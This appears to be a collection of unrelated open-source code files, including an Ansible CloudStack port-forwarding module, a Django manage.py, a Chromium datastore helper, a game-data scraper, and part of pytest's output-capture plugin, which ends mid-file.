           Configuration.clearingOperationsInputGDB, Configuration.clearingOperationsURL)

        if (self.scratchGDB == None) or (not arcpy.Exists(self.scratchGDB)):
            self.scratchGDB = UnitTestUtilities.createScratch(Configuration.clearingOperationsPath)

        # set up inputs
        self.inputArea = os.path.join(Configuration.clearingOperationsInputGDB, r"AO")

        UnitTestUtilities.checkFilePaths([Configuration.clearingOperationsPath])

        UnitTestUtilities.checkGeoObjects([Configuration.clearingOperationsInputGDB,
                                           self.toolboxUnderTest,
                                           self.scratchGDB,
                                           self.inputArea])

    def tearDown(self):
        # Remove the scratch geodatabase created in setUp.
        if Configuration.DEBUG == True: print(" ClearingOperationsTestCase.tearDown")
        UnitTestUtilities.deleteScratch(self.scratchGDB)

    def testClearingOperationsAreaGRG(self):
        # Run the Canvas Area GRG tool with a 100m x 100m cell grid and
        # verify the expected 40 grid cells are produced over the AO area.
        if Configuration.DEBUG == True:print(".....ClearingOperationsCanvasAreaGRGTestCase.testClearingOperationsAreaGRG")

        print("Importing toolbox...")
        arcpy.ImportToolbox(self.toolboxUnderTest)
        arcpy.env.overwriteOutput = True

        # inputs for the script tool
        cellWidth = 100
        cellHeight = 100
        cellunits = "Meters"
        labelStart = "Lower-Left"
        labelStyle = "Alpha-Numeric"
        output = os.path.join(self.scratchGDB, "grg")

        # Testing
        runToolMsg="Running tool (Canvas Area GRG)"
        arcpy.AddMessage(runToolMsg)
        Configuration.Logger.info(runToolMsg)

        try:
            # Calling the CanvasAreaGRG_ClearingOperations Script Tool
            arcpy.CanvasAreaGRG_ClearingOperations(self.inputArea, cellWidth, cellHeight,
                cellunits, labelStart, labelStyle, output)
        except arcpy.ExecuteError:
            UnitTestUtilities.handleArcPyError()
        except:
            UnitTestUtilities.handleGeneralError()

        result = arcpy.GetCount_management(output)
        count = int(result.getOutput(0))
        print("number features: " + str(count))
        # 40 = expected cell count for the AO extent at 100m x 100m cells.
        self.assertEqual(count, 40)

if __name__ == "__main__":
    unittest.main()
preo/ansible-modules-extras
refs/heads/devel
cloud/cloudstack/cs_portforward.py
7
#!/usr/bin/python # -*- coding: utf-8 -*- # # (c) 2015, René Moser <mail@renemoser.net> # # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. DOCUMENTATION = ''' --- module: cs_portforward short_description: Manages port forwarding rules on Apache CloudStack based clouds. description: - Create, update and remove port forwarding rules. version_added: '2.0' author: "René Moser (@resmo)" options: ip_address: description: - Public IP address the rule is assigned to. required: true vm: description: - Name of virtual machine which we make the port forwarding rule for. - Required if C(state=present). required: false default: null state: description: - State of the port forwarding rule. required: false default: 'present' choices: [ 'present', 'absent' ] protocol: description: - Protocol of the port forwarding rule. required: false default: 'tcp' choices: [ 'tcp', 'udp' ] public_port: description: - Start public port for this rule. required: true public_end_port: description: - End public port for this rule. - If not specified equal C(public_port). required: false default: null private_port: description: - Start private port for this rule. required: true private_end_port: description: - End private port for this rule. - If not specified equal C(private_port). 
required: false default: null open_firewall: description: - Whether the firewall rule for public port should be created, while creating the new rule. - Use M(cs_firewall) for managing firewall rules. required: false default: false vm_guest_ip: description: - VM guest NIC secondary IP address for the port forwarding rule. required: false default: false domain: description: - Domain the C(vm) is related to. required: false default: null account: description: - Account the C(vm) is related to. required: false default: null project: description: - Name of the project the C(vm) is located in. required: false default: null zone: description: - Name of the zone in which the virtual machine is in. - If not set, default zone is used. required: false default: null poll_async: description: - Poll async jobs until job has finished. required: false default: true extends_documentation_fragment: cloudstack ''' EXAMPLES = ''' # 1.2.3.4:80 -> web01:8080 - local_action: module: cs_portforward ip_address: 1.2.3.4 vm: web01 public_port: 80 private_port: 8080 # forward SSH and open firewall - local_action: module: cs_portforward ip_address: '{{ public_ip }}' vm: '{{ inventory_hostname }}' public_port: '{{ ansible_ssh_port }}' private_port: 22 open_firewall: true # forward DNS traffic, but do not open firewall - local_action: module: cs_portforward ip_address: 1.2.3.4 vm: '{{ inventory_hostname }}' public_port: 53 private_port: 53 protocol: udp open_firewall: true # remove ssh port forwarding - local_action: module: cs_portforward ip_address: 1.2.3.4 public_port: 22 private_port: 22 state: absent ''' RETURN = ''' --- ip_address: description: Public IP address. returned: success type: string sample: 1.2.3.4 protocol: description: Protocol. returned: success type: string sample: tcp private_port: description: Start port on the virtual machine's IP address. returned: success type: int sample: 80 private_end_port: description: End port on the virtual machine's IP address. 
returned: success type: int public_port: description: Start port on the public IP address. returned: success type: int sample: 80 public_end_port: description: End port on the public IP address. returned: success type: int sample: 80 tags: description: Tags related to the port forwarding. returned: success type: list sample: [] vm_name: description: Name of the virtual machine. returned: success type: string sample: web-01 vm_display_name: description: Display name of the virtual machine. returned: success type: string sample: web-01 vm_guest_ip: description: IP of the virtual machine. returned: success type: string sample: 10.101.65.152 ''' try: from cs import CloudStack, CloudStackException, read_config has_lib_cs = True except ImportError: has_lib_cs = False # import cloudstack common from ansible.module_utils.cloudstack import * class AnsibleCloudStackPortforwarding(AnsibleCloudStack): def __init__(self, module): AnsibleCloudStack.__init__(self, module) self.portforwarding_rule = None self.vm_default_nic = None def get_public_end_port(self): if not self.module.params.get('public_end_port'): return self.module.params.get('public_port') return self.module.params.get('public_end_port') def get_private_end_port(self): if not self.module.params.get('private_end_port'): return self.module.params.get('private_port') return self.module.params.get('private_end_port') def get_vm_guest_ip(self): vm_guest_ip = self.module.params.get('vm_guest_ip') default_nic = self.get_vm_default_nic() if not vm_guest_ip: return default_nic['ipaddress'] for secondary_ip in default_nic['secondaryip']: if vm_guest_ip == secondary_ip['ipaddress']: return vm_guest_ip self.module.fail_json(msg="Secondary IP '%s' not assigned to VM" % vm_guest_ip) def get_vm_default_nic(self): if self.vm_default_nic: return self.vm_default_nic nics = self.cs.listNics(virtualmachineid=self.get_vm(key='id')) if nics: for n in nics['nic']: if n['isdefault']: self.vm_default_nic = n return self.vm_default_nic 
self.module.fail_json(msg="No default IP address of VM '%s' found" % self.module.params.get('vm')) def get_portforwarding_rule(self): if not self.portforwarding_rule: protocol = self.module.params.get('protocol') public_port = self.module.params.get('public_port') public_end_port = self.get_public_end_port() private_port = self.module.params.get('private_port') private_end_port = self.get_public_end_port() args = {} args['ipaddressid'] = self.get_ip_address(key='id') args['projectid'] = self.get_project(key='id') portforwarding_rules = self.cs.listPortForwardingRules(**args) if portforwarding_rules and 'portforwardingrule' in portforwarding_rules: for rule in portforwarding_rules['portforwardingrule']: if protocol == rule['protocol'] \ and public_port == int(rule['publicport']): self.portforwarding_rule = rule break return self.portforwarding_rule def present_portforwarding_rule(self): portforwarding_rule = self.get_portforwarding_rule() if portforwarding_rule: portforwarding_rule = self.update_portforwarding_rule(portforwarding_rule) else: portforwarding_rule = self.create_portforwarding_rule() return portforwarding_rule def create_portforwarding_rule(self): args = {} args['protocol'] = self.module.params.get('protocol') args['publicport'] = self.module.params.get('public_port') args['publicendport'] = self.get_public_end_port() args['privateport'] = self.module.params.get('private_port') args['privateendport'] = self.get_private_end_port() args['openfirewall'] = self.module.params.get('open_firewall') args['vmguestip'] = self.get_vm_guest_ip() args['ipaddressid'] = self.get_ip_address(key='id') args['virtualmachineid'] = self.get_vm(key='id') portforwarding_rule = None self.result['changed'] = True if not self.module.check_mode: portforwarding_rule = self.cs.createPortForwardingRule(**args) poll_async = self.module.params.get('poll_async') if poll_async: portforwarding_rule = self._poll_job(portforwarding_rule, 'portforwardingrule') return portforwarding_rule def 
update_portforwarding_rule(self, portforwarding_rule): args = {} args['protocol'] = self.module.params.get('protocol') args['publicport'] = self.module.params.get('public_port') args['publicendport'] = self.get_public_end_port() args['privateport'] = self.module.params.get('private_port') args['privateendport'] = self.get_private_end_port() args['openfirewall'] = self.module.params.get('open_firewall') args['vmguestip'] = self.get_vm_guest_ip() args['ipaddressid'] = self.get_ip_address(key='id') args['virtualmachineid'] = self.get_vm(key='id') if self._has_changed(args, portforwarding_rule): self.result['changed'] = True if not self.module.check_mode: # API broken in 4.2.1?, workaround using remove/create instead of update # portforwarding_rule = self.cs.updatePortForwardingRule(**args) self.absent_portforwarding_rule() portforwarding_rule = self.cs.createPortForwardingRule(**args) poll_async = self.module.params.get('poll_async') if poll_async: portforwarding_rule = self._poll_job(portforwarding_rule, 'portforwardingrule') return portforwarding_rule def absent_portforwarding_rule(self): portforwarding_rule = self.get_portforwarding_rule() if portforwarding_rule: self.result['changed'] = True args = {} args['id'] = portforwarding_rule['id'] if not self.module.check_mode: res = self.cs.deletePortForwardingRule(**args) poll_async = self.module.params.get('poll_async') if poll_async: self._poll_job(res, 'portforwardingrule') return portforwarding_rule def get_result(self, portforwarding_rule): if portforwarding_rule: if 'id' in portforwarding_rule: self.result['id'] = portforwarding_rule['id'] if 'virtualmachinedisplayname' in portforwarding_rule: self.result['vm_display_name'] = portforwarding_rule['virtualmachinedisplayname'] if 'virtualmachinename' in portforwarding_rule: self.result['vm_name'] = portforwarding_rule['virtualmachinename'] if 'ipaddress' in portforwarding_rule: self.result['ip_address'] = portforwarding_rule['ipaddress'] if 'vmguestip' in 
portforwarding_rule: self.result['vm_guest_ip'] = portforwarding_rule['vmguestip'] if 'publicport' in portforwarding_rule: self.result['public_port'] = int(portforwarding_rule['publicport']) if 'publicendport' in portforwarding_rule: self.result['public_end_port'] = int(portforwarding_rule['publicendport']) if 'privateport' in portforwarding_rule: self.result['private_port'] = int(portforwarding_rule['privateport']) if 'privateendport' in portforwarding_rule: self.result['private_end_port'] = int(portforwarding_rule['privateendport']) if 'protocol' in portforwarding_rule: self.result['protocol'] = portforwarding_rule['protocol'] if 'tags' in portforwarding_rule: self.result['tags'] = [] for tag in portforwarding_rule['tags']: result_tag = {} result_tag['key'] = tag['key'] result_tag['value'] = tag['value'] self.result['tags'].append(result_tag) return self.result def main(): module = AnsibleModule( argument_spec = dict( ip_address = dict(required=True), protocol= dict(choices=['tcp', 'udp'], default='tcp'), public_port = dict(type='int', required=True), public_end_port = dict(type='int', default=None), private_port = dict(type='int', required=True), private_end_port = dict(type='int', default=None), state = dict(choices=['present', 'absent'], default='present'), open_firewall = dict(choices=BOOLEANS, default=False), vm_guest_ip = dict(default=None), vm = dict(default=None), zone = dict(default=None), domain = dict(default=None), account = dict(default=None), project = dict(default=None), poll_async = dict(choices=BOOLEANS, default=True), api_key = dict(default=None), api_secret = dict(default=None, no_log=True), api_url = dict(default=None), api_http_method = dict(choices=['get', 'post'], default='get'), api_timeout = dict(type='int', default=10), ), required_together = ( ['api_key', 'api_secret', 'api_url'], ), supports_check_mode=True ) if not has_lib_cs: module.fail_json(msg="python library cs required: pip install cs") try: acs_pf = 
AnsibleCloudStackPortforwarding(module) state = module.params.get('state') if state in ['absent']: pf_rule = acs_pf.absent_portforwarding_rule() else: pf_rule = acs_pf.present_portforwarding_rule() result = acs_pf.get_result(pf_rule) except CloudStackException, e: module.fail_json(msg='CloudStackException: %s' % str(e)) module.exit_json(**result) # import module snippets from ansible.module_utils.basic import * if __name__ == '__main__': main()
Eloston/nsmb-tools
refs/heads/master
classidtool/libupdate.py
1
'''
This file is part of nsmb-tools.

nsmb-tools is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.

nsmb-tools is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with nsmb-tools. If not, see <http://www.gnu.org/licenses/>.
'''
# ClassID Tool
# NameDatabase updating module

import urllib.request
import re


def update_namedatabase(namedatabase_path, urllist_path):
    '''Update the NameDatabase file.

    Reads the URLList file at *urllist_path*, extracts the URL registered
    under the name ``NameDatabase_Update``, downloads it, and writes the
    payload to *namedatabase_path*.

    Returns a ``(status, detail)`` tuple where *status* is one of
    "urllist-parse-failure", "download-failure", "write-failure" or
    "success"; *detail* is the stringified exception, or None on success.
    '''
    try:
        # URLList format: {Name#URL}
        regexp = re.compile(r"\{(?P<URLName>.+)\#(?P<URL>.+)\}")
        with open(urllist_path, "r") as file_obj:
            re_match = regexp.match(file_obj.read())
        if re_match is None:  # fixed: was `== None`
            raise Exception("URLList is in an invalid format")
        if re_match.group("URLName") == "NameDatabase_Update":
            namedatabase_url = re_match.group("URL")
        else:
            raise Exception("Could not find URL for `NameDatabase_Update` in URLList")
    except Exception as e:
        return ("urllist-parse-failure", str(e))

    try:
        # Context manager guarantees the HTTP response is closed even if
        # read() fails (the original leaked it on a read error).
        with urllib.request.urlopen(namedatabase_url) as http_obj:
            new_namedatabase = http_obj.read()
    except Exception as e:
        return ("download-failure", str(e))

    try:
        with open(namedatabase_path, 'wb') as file_obj:
            file_obj.write(new_namedatabase)
    except Exception as e:
        return ("write-failure", str(e))

    return ("success", None)
svfat/django-tutorial-bugreport
refs/heads/master
manage.py
404
#!/usr/bin/env python
"""Django management entry point (equivalent to the stock ``manage.py``)."""
import os
import sys


def main():
    # Point Django at the project settings unless the caller already set it.
    os.environ.setdefault("DJANGO_SETTINGS_MODULE", "project.settings")
    # Imported lazily so DJANGO_SETTINGS_MODULE is in place first.
    from django.core.management import execute_from_command_line
    execute_from_command_line(sys.argv)


if __name__ == "__main__":
    main()
hgl888/chromium-crosswalk
refs/heads/master
chrome/common/extensions/docs/server2/datastore_util.py
29
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.

import cPickle
import googledatastore as datastore
import logging

from future import Future

# N.B.: In order to use this module you should have a working cloud development
# environment configured with the googledatastore module installed.
#
# Please see https://cloud.google.com/datastore/docs/getstarted/start_python/

_DATASET_NAME = 'chrome-apps-doc'
_PERSISTENT_OBJECT_KIND = 'PersistentObjectStoreItem'
_VALUE_PROPERTY_NAME = 'pickled_value'

# The max number of entities to include in a single request. This is capped at
# 500 by the service. In practice we may send fewer due to _MAX_REQUEST_SIZE
_MAX_BATCH_SIZE = 500

# The maximum entity size allowed by Datastore.
_MAX_ENTITY_SIZE = 1024*1024

# The maximum request size (in bytes) to send Datastore. This is an approximate
# size based on the sum of entity blob_value sizes.
_MAX_REQUEST_SIZE = 5*1024*1024


def _CreateEntity(name, value):
  '''Build a PersistentObjectStoreItem entity keyed by |name| whose unindexed
  pickled_value property holds the (already pickled) |value| blob.'''
  entity = datastore.Entity()
  path = entity.key.path_element.add()
  path.kind = _PERSISTENT_OBJECT_KIND
  path.name = name
  pickled_value_property = entity.property.add()
  pickled_value_property.name = _VALUE_PROPERTY_NAME
  pickled_value_property.value.indexed = False
  pickled_value_property.value.blob_value = value
  return entity


def _CreateBatches(data):
  '''Constructs batches of at most _MAX_BATCH_SIZE entities to cover all
  entities defined in |data| without exceeding the transaction size limit.

  This is a generator emitting lists of entities.
  '''
  def get_size(entity):
    return len(entity.property[0].value.blob_value)

  entities = [_CreateEntity(name, value) for name, value in data.iteritems()]
  # Fixed: the original indexed entities[0] unconditionally and raised
  # IndexError when |data| was empty (which happens whenever culling in
  # PushData removes every key).
  if not entities:
    return
  batch_start = 0
  batch_end = 1
  batch_size = get_size(entities[0])
  while batch_end < len(entities):
    next_size = get_size(entities[batch_end])
    # Only split on the size limit when the current batch is non-empty;
    # otherwise a single entity larger than _MAX_REQUEST_SIZE would make the
    # original loop yield empty batches forever. (PushData culls entities
    # above _MAX_ENTITY_SIZE, so this is a latent-bug guard, not a behavior
    # change for valid input.)
    if (batch_end - batch_start >= _MAX_BATCH_SIZE or
        (batch_size + next_size > _MAX_REQUEST_SIZE and
         batch_end > batch_start)):
      yield entities[batch_start:batch_end], batch_end, len(entities)
      batch_start = batch_end
      batch_size = 0
    else:
      batch_size += next_size
      batch_end = batch_end + 1

  if batch_end > batch_start and batch_start < len(entities):
    yield entities[batch_start:batch_end], batch_end, len(entities)


def PushData(data, original_data=None):
  '''Pushes a bunch of data into the datastore. The data should be a dict. Each
  key is treated as a namespace, and each value is also a dict. A new datastore
  entry is upserted for every inner key, with the value pickled into the
  |pickled_value| field.

  For example, if given the dictionary:

  {
    'fruit': {
      'apple': 1234,
      'banana': 'yellow',
      'trolling carrot': { 'arbitrarily complex': ['value', 'goes', 'here'] }
    },
    'animal': {
      'sheep': 'baaah',
      'dog': 'woof',
      'trolling cat': 'moo'
    }
  }

  this would result in a push of 6 keys in total, with the following IDs:

    Key('PersistentObjectStoreItem', 'fruit/apple')
    Key('PersistentObjectStoreItem', 'fruit/banana')
    Key('PersistentObjectStoreItem', 'fruit/trolling carrot')
    Key('PersistentObjectStoreItem', 'animal/sheep')
    Key('PersistentObjectStoreItem', 'animal/dog')
    Key('PersistentObjectStoreItem', 'animal/trolling cat')

  If given |original_data|, this will only push key-value pairs for entries
  that are either new or have changed from their original (pickled) value.

  Caveat: Pickling and unpickling a dictionary can (but does not always) change
  its key order. This means that objects will often be seen as changed even when
  they haven't changed.
  '''
  # Fixed: the original used a mutable default argument (original_data={}).
  if original_data is None:
    original_data = {}
  datastore.set_options(dataset=_DATASET_NAME)

  def flatten(dataset):
    flat = {}
    for namespace, items in dataset.iteritems():
      for k, v in items.iteritems():
        flat['%s/%s' % (namespace, k)] = cPickle.dumps(v)
    return flat

  logging.info('Flattening data sets...')
  data = flatten(data)
  original_data = flatten(original_data)

  logging.info('Culling new data...')
  # Iterate over a snapshot of the keys: we delete from |data| while looping.
  for k in list(data.keys()):
    if ((k in original_data and original_data[k] == data[k]) or
        (len(data[k]) > _MAX_ENTITY_SIZE)):
      del data[k]

  for batch, n, total in _CreateBatches(data):
    commit_request = datastore.CommitRequest()
    commit_request.mode = datastore.CommitRequest.NON_TRANSACTIONAL
    commit_request.mutation.upsert.extend(list(batch))
    logging.info('Committing %s/%s entities...' % (n, total))
    datastore.commit(commit_request)
ReamerKim/pad_crawling
refs/heads/master
model/Monster.py
1
#!/usr/bin/env python # -*- coding: utf-8 -*- import urllib import re import requests import json _no = re.compile(r"""<div class="no">No. ([^<]+)</div>"""); _name = re.compile(r"""<div class="name">([^<]+)</div>""") _icon = re.compile(r"""<img class="imgicon" src="([^"]+)" /></div>""") _cost = re.compile(r"""<div class="cost"><dl><dt>[^<]+</dt><dd>([^<]+)</dd>""") _exp = re.compile(r"""<div class="exp"><dl><dt>[^<]+</dt><dd style="width: 92px;"><span style="float:left;">([^<]+)</span> """); _status= re.compile(r"""<div class="block stateInfo">([^@]{3,5000}?)</div>"""); _attr= re.compile(r"""fonticon_attr_([\d]+)"""); _type=re.compile(r"""fonticon/fonticon_type_([\d]+)"""); _skill = re.compile(r"""<div class="block skillInfo">([^@]+)<div class="block awakenInfo">"""); _awakeSkill = re.compile(r"""<div class="block awakenInfo">([^@]{3,5000}?)</div>"""); ''' Get monster data from inven json structure monstercode: int maxattack: int monsterattribute: int recoverymod: str monstername: unicode exptype: int needexp: int hpmod: str attack: int exp: int maxhp: int maxrecovery: int attackmod: str maxlevel: int hp: int recovery: int ''' def get_monster_default_data(monster_num): data = { 'code': '%d'%monster_num, 'mode': '2' } url = r"""http://m.inven.co.kr/site/pad/monster_info.ajax.php""" r = requests.post(url,data=data) t = r.text rst = json.loads(t) return rst; def get_charactor_num(uni_c): com = re.compile(_no); rst = com.findall(uni_c) if len(rst) != 0: return int(rst[0],10) else: raise Exception("ERROR") def get_charactor_name(uni_c): com = re.compile(_name); rst = com.findall(uni_c) if len(rst) != 0: return rst[0] else: raise Exception("ERROR") def get_charactor_icon_url(uni_c): com = re.compile(_icon); rst = com.findall(uni_c) if len(rst) != 0: return rst[0] else: raise Exception("ERROR") def get_charactor_cost(uni_c): com = re.compile(_cost); rst = com.findall(uni_c) if len(rst) != 0: return int(rst[0]) else: raise Exception("ERROR") def get_charactor_exp(uni_c): 
com = re.compile(_exp); rst = com.findall(uni_c) if len(rst) != 0: return int(rst[0].replace(",","")) else: raise Exception("ERROR") def get_charactor_status(uni_c): # return Max_Lv, min_hp, max_hp, min_attack, max_attack, min_heal, max_heal com = re.compile(_status); rst = com.findall(uni_c) com2 = re.compile(r"""th>Lv.1</th>\s+<th class="nobg">Lv.([^<]+)</th>\s+</tr>\s+<tr>\s+<td height="26">HP</td>\s+<td>([^<]+)</td>\s+<td class="nobg">([^<]+) <span class="green">[^<]+</span></td>\s+</tr>\s+<tr>\s+<td height="24">[^<]+</td>\s+<td>([^<]+)</td>\s+<td class="nobg">([^<]+) <span class="green">[^<]+</span></td>\s+</tr>\s+<tr>\s+<td height="23">[^<]+</td>\s+<td>([^<]+)</td>\s+<td class="nobg">([^<]+)""") if len(rst) != 0: #require get data from HTML Table r = com2.findall(rst[0]); return int(r[0][0]), int(r[0][1]), int(r[0][2]), int(r[0][3]), int(r[0][4]), int(r[0][5]), int(r[0][6]) else: raise Exception("ERROR") def get_charactor_attr(uni_c): com = re.compile(_attr); rst = com.findall(uni_c) if len(rst) != 0: rr = [] for r in rst: rr.append(int(r)) return rr else: raise Exception("ERROR") def get_charactor_type(uni_c): com = re.compile(_type); rst = com.findall(uni_c) if len(rst) != 0: rr = [] for r in rst: rr.append(int(r)) return rr else: raise Exception("ERROR") class Monster(object): def __init__(self, _no= 0, _name= "None", _cost= 0, _exp= 0, _expType=0, _maxLevel= 0, _minAttackPoint= 0, _maxAttackPoint= 0, _attackPointType= 0, _minHealthPoint= 0, _maxHealthPoint= 0, _healthPointType= 0, _minHealPoint= 0, _maxHealPoint= 0, _healPointType= 0, _mainAttribute= 0, _subAttribute= 0, _mainType= 0, _subType= 0, _skill= 0, _LeaderSKill= 0, _AwakeSkill= "None", _prevEvolution= 0, _nextEvolution= 0, _imageUrl= "None"): self._no = _no; self._name = _name; self._cost = _cost; self._exp = _exp; self._expType = _expType; self._maxLevel = _maxLevel; self._minAttackPoint = _minAttackPoint; self._maxAttackPoint = _maxAttackPoint; self._attackPointType = _attackPointType; 
self._minHealthPoint = _minHealthPoint; self._maxHealthPoint = _maxHealthPoint; self._healthPointType = _healthPointType; self._minHealPoint = _minHealPoint; self._maxHealPoint = _maxHealPoint; self._healPointType = _healPointType; self._mainAttribute = _mainAttribute; self._subAttribute = _subAttribute; self._mainType = _mainType; self._subType = _subType; self._skill = _skill; # self._LeaderSKill = _LeaderSKill; # self._AwakeSkill = _AwakeSkill; # self._prevEvolution = _prevEvolution; # self._nextEvolution = _nextEvolution; # self._imageUrl = _imageUrl; # c is euc-kr string ! @classmethod def get_charactor_info_from_string(cls, c): # All String Save the UTF-8 #uni_c = unicode(c,'euc-kr').encode('utf-8') uni_c = c #print get_charactor_num(uni_c), get_charactor_icon_url(uni_c), get_charactor_cost(uni_c), get_charactor_exp(uni_c), get_charactor_status(uni_c), get_charactor_attr(uni_c), get_charactor_type(uni_c) #추후 작업을 계속 하여야 한다. 이부분에 아직 데이터가 정제가 되지 않았음 return cls(_no = get_charactor_num(uni_c), _name= get_charactor_name(uni_c), _cost= get_charactor_cost(uni_c), _exp = get_charactor_exp(uni_c)) @classmethod def get_charactor_info_from_file(cls, _path): # All String Save the UTF-8 f = open(_path) c = f.read() f.close() return cls.get_charactor_info_from_string(c); @classmethod def get_charactor_info_from_url(cls, id_num): # get Monster Data from inven url = "http://m.inven.co.kr/site/pad/monster.php?code=%d"%id_num u = urllib.urlopen(url); c = u.read() u.close() return cls.get_charactor_info_from_string(c); @classmethod def get_charactor_info_from_json(cls, id_num): try: #print 'get %d'%id_num rst = get_monster_default_data(id_num) m = cls(_no=rst['monstercode'], _name=rst['monstername'].encode('utf-8'), _maxLevel=rst['maxlevel'], _minAttackPoint=rst['attack'], _maxAttackPoint=rst['maxattack'], _attackPointType = float(rst['attackmod']) , _minHealthPoint= rst['hp'], _maxHealthPoint= rst['maxhp'] , _healthPointType=float(rst['hpmod']), _minHealPoint=rst['recovery'], 
_maxHealPoint=rst['maxrecovery'], _healPointType=float(rst['recoverymod']), _exp = rst['exp'], _expType = rst['exptype']) ''' 추후 추가해야 할 부분들 self._skill = _skill; # self._LeaderSKill = _LeaderSKill; # self._AwakeSkill = _AwakeSkill; # self._prevEvolution = _prevEvolution; # self._nextEvolution = _nextEvolution; # ''' url = "http://m.inven.co.kr/site/pad/monster.php?code=%d"%id_num u = urllib.urlopen(url); c = u.read() u.close() m._cost = get_charactor_cost(c); attr = get_charactor_attr(c); if len(attr) == 1: m._mainAttribute = attr[0] elif len(attr) == 2: m._mainAttribute = attr[0] m._subAttribute = attr[1] types = get_charactor_type(c); if len(types) == 1: m._mainType = types[0] elif len(types) == 2: m._mainType = types[0] m._subType = types[1] m._imageUrl = get_charactor_icon_url(c); return m except Exception as e: print "Not find (%d) monster"%id_num print 'Error - ', e return None; def showData(self): print "id:",self._no print "name: ",self._name print "cost: ", self._cost print "exp: ", self._exp print "attribute: ",self._mainAttribute, self._subAttribute print "type: ", self._mainType, self._subType # 해당 lv에 몬스터의 hp, attack, recovery 를 구한다. def get_monster_status(self,lv,HPplusEgg=0,AttackPlusEgg=0,RecoveryPlusEgg=0): if lv > self._maxLevel: lv = self._maxLevel calc = lambda minVal,maxVal,level,maxLevel,mod:int(round(float(minVal) + (float(maxVal) - float(minVal))*pow((float(level) - 1) / (float(maxLevel) - 1) , float(mod)))) hp = calc(self._minHealthPoint, self._maxHealthPoint, lv, self._maxLevel, self._healthPointType) + HPplusEgg*10 attack = calc(self._minAttackPoint, self._maxAttackPoint, lv, self._maxLevel, self._attackPointType) + AttackPlusEgg*5 recovery = calc(self._minHealPoint, self._maxHealPoint, lv, self._maxLevel, self._healPointType) + RecoveryPlusEgg*3 return hp, attack, recovery
bobuk/urpc
refs/heads/master
setup.py
1
from setuptools import setup, find_packages

# Trove classifiers describing the package, kept in one place.
_CLASSIFIERS = [
    "Programming Language :: Python",
    "Programming Language :: Python :: 3",
    "Development Status :: 4 - Beta",
    "Environment :: Other Environment",
    "Intended Audience :: Developers",
    "Operating System :: OS Independent",
    "Topic :: Software Development :: Libraries :: Python Modules",
]

# Packaging metadata for uRPC, a minimal RPC layer on top of Redis.
setup(
    name="urpc",
    version="0.3.4",
    py_modules=["urpc", "aiourpc"],
    url="http://github.com/bobuk/urpc",
    author="Grigory Bakunov",
    author_email="thebobuk@ya.ru",
    description="uRPC is oversimplistic RPC over Redis",
    install_requires=["redis"],
    scripts=["scripts/urpc-cli"],
    classifiers=_CLASSIFIERS,
)
rnestler/servo
refs/heads/master
tests/wpt/web-platform-tests/tools/pytest/_pytest/capture.py
178
""" per-test stdout/stderr capturing mechanism. """ from __future__ import with_statement import sys import os from tempfile import TemporaryFile import py import pytest from py.io import TextIO unicode = py.builtin.text patchsysdict = {0: 'stdin', 1: 'stdout', 2: 'stderr'} def pytest_addoption(parser): group = parser.getgroup("general") group._addoption( '--capture', action="store", default="fd" if hasattr(os, "dup") else "sys", metavar="method", choices=['fd', 'sys', 'no'], help="per-test capturing method: one of fd|sys|no.") group._addoption( '-s', action="store_const", const="no", dest="capture", help="shortcut for --capture=no.") @pytest.hookimpl(hookwrapper=True) def pytest_load_initial_conftests(early_config, parser, args): _readline_workaround() ns = early_config.known_args_namespace pluginmanager = early_config.pluginmanager capman = CaptureManager(ns.capture) pluginmanager.register(capman, "capturemanager") # make sure that capturemanager is properly reset at final shutdown early_config.add_cleanup(capman.reset_capturings) # make sure logging does not raise exceptions at the end def silence_logging_at_shutdown(): if "logging" in sys.modules: sys.modules["logging"].raiseExceptions = False early_config.add_cleanup(silence_logging_at_shutdown) # finally trigger conftest loading but while capturing (issue93) capman.init_capturings() outcome = yield out, err = capman.suspendcapture() if outcome.excinfo is not None: sys.stdout.write(out) sys.stderr.write(err) class CaptureManager: def __init__(self, method): self._method = method def _getcapture(self, method): if method == "fd": return MultiCapture(out=True, err=True, Capture=FDCapture) elif method == "sys": return MultiCapture(out=True, err=True, Capture=SysCapture) elif method == "no": return MultiCapture(out=False, err=False, in_=False) else: raise ValueError("unknown capturing method: %r" % method) def init_capturings(self): assert not hasattr(self, "_capturing") self._capturing = 
self._getcapture(self._method) self._capturing.start_capturing() def reset_capturings(self): cap = self.__dict__.pop("_capturing", None) if cap is not None: cap.pop_outerr_to_orig() cap.stop_capturing() def resumecapture(self): self._capturing.resume_capturing() def suspendcapture(self, in_=False): self.deactivate_funcargs() cap = getattr(self, "_capturing", None) if cap is not None: try: outerr = cap.readouterr() finally: cap.suspend_capturing(in_=in_) return outerr def activate_funcargs(self, pyfuncitem): capfuncarg = pyfuncitem.__dict__.pop("_capfuncarg", None) if capfuncarg is not None: capfuncarg._start() self._capfuncarg = capfuncarg def deactivate_funcargs(self): capfuncarg = self.__dict__.pop("_capfuncarg", None) if capfuncarg is not None: capfuncarg.close() @pytest.hookimpl(hookwrapper=True) def pytest_make_collect_report(self, collector): if isinstance(collector, pytest.File): self.resumecapture() outcome = yield out, err = self.suspendcapture() rep = outcome.get_result() if out: rep.sections.append(("Captured stdout", out)) if err: rep.sections.append(("Captured stderr", err)) else: yield @pytest.hookimpl(hookwrapper=True) def pytest_runtest_setup(self, item): self.resumecapture() yield self.suspendcapture_item(item, "setup") @pytest.hookimpl(hookwrapper=True) def pytest_runtest_call(self, item): self.resumecapture() self.activate_funcargs(item) yield #self.deactivate_funcargs() called from suspendcapture() self.suspendcapture_item(item, "call") @pytest.hookimpl(hookwrapper=True) def pytest_runtest_teardown(self, item): self.resumecapture() yield self.suspendcapture_item(item, "teardown") @pytest.hookimpl(tryfirst=True) def pytest_keyboard_interrupt(self, excinfo): self.reset_capturings() 